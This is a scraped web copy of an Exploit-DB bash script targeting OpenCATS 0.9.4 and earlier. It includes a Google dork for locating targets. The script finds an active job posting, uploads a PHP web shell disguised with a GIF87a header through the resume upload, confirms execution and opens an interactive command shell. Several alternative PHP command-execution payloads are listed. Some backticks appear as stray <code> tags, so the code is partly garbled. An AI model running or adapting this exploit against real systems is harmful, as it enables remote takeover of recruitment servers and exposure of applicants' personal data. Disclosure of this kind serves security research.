扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 | # Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE) # Google Dork: intext:"Current Available Openings, Recently Posted Jobs" # Date: 21/09/2021 # Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar # Vendor Homepage: https://www.opencats.org/ # Software Link: https://github.com/opencats/OpenCATS # Version: <=0.9.4 Countach # Tested on: Debian, CentOS, Windows Server #!/bin/bash if [ $# -eq 0 ] then echo "Usage: $0 <target URL>" exit fi # if a payload doesn't work, try another payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>' #payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>' #payload='GIF87a<?php echo <code>$_REQUEST[0]</code>; ?>' #payload='GIF87a<?php echo system($_REQUEST[0]); ?>' #payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>' target=$1 green="\033[0;32m" red="\033[0;31m" reset="\033[0m" #====================== Functions rev() { while true do echo -n -e "\n$ " read cmd curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d" done } upload() { curl -skL $1/$2 \ -H "Connection: close" \ -F resumeFile=@"$3;type=application/x-php" \ -F ID="$firstJb" \ -F candidateID="-1" \ -F applyToJobSubAction="resumeLoad" \ --compressed \ --insecure } getVersion() { ver=<code>curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*" if [ -z "${ver}" ] then ver=<code>curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*" if [ -z "${ver}" ] then echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}" return 0 fi fi echo -e "${green}[*] Version detected: $ver${reset}" } writePayload(){ tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php" file=<code>basename $tmpfile echo "$1" > $tmpfile } banner(){ echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d echo -e "\n" } #====================== banner echo "[*] Attacking target $target" echo "[*] Checking CATS version..." getVersion $target #exit echo "[*] Creating temp file with payload..." writePayload "$payload" #exit echo "[*] Checking active jobs..." jbRequest=<code>curl -skL $target'/careers/index.php?m=careers&p=showAll' numJb=<code>echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/' firstJb=<code>echo "$jbRequest" | grep -m 1 '<td><a href="https://www.exploit-db.com/exploits/50585/index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/' if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] No active jobs found.${reset}" echo "[*] Trying another path..." jbRequest=<code>curl -skL $target'/index.php?m=careers&p=showAll' numJb=<code>echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/' if [[ ! $numJb -gt 0 ]] then echo -e "${red}[-] Couldn't find any active job.${reset}" exit fi fi firstJb=<code>echo "$jbRequest" | grep -m 1 '<td><a href="https://www.exploit-db.com/exploits/50585/index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/' echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}" echo "[*] Sending payload..." req=<code>upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile" if ! <code>echo "$req" | egrep -q "still be uploaded|will be uploaded|$file" then echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}" echo "[*] Checking by another method..." sed -i "s/GIF87a//" $tmpfile req=<code>upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile" if ! <code>echo "$req" | egrep -q "still be uploaded|will be uploaded|$file" then echo -e "${red}[-] Couldn't upload payload...${reset}" exit fi fi echo -e "${green}[+] Payload $file uploaded!" echo "[*] Deleting created temp file..." rm $tmpfile echo "[*] Checking shell..." check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file") if <code>echo $check | grep -q "0x7359" then echo -e "${green}[+] Got shell! :D${reset}" curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d" rev $target/upload/careerportaladd/$file else echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}" fi |
体验盒子
